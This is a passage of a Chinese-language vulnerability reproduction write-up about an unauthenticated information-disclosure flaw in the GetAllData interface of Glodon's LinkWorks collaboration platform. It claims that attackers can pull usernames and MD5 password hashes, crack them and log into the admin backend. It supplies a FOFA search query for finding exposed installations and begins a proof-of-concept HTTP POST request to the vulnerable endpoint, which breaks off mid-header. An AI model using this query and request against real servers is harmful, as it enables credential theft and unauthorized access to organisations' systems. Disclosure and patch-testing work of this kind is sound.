0x01 产品简介

广联达 LinkWorks（也称为 GlinkLink 或 GTP-LinkWorks）是广联达公司（Glodon）开发的一种BIM（建筑信息模型）协同平台。广联达是中国领先的数字建造技术提供商之一，专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达-Linkworks协同办公管理平台 GetAllData接口处存在信息泄露漏洞，未经身份认证的攻击者可获取用户名密码等敏感信息。破解密码md5可登录后台，使系统处于极不安全状态。

0x03 复现环境

FOFA：

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现

PoC

POST /WebService/Lk6SyncService/MrMMSSvc/DataSvc.asmx/GetAllData HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 8.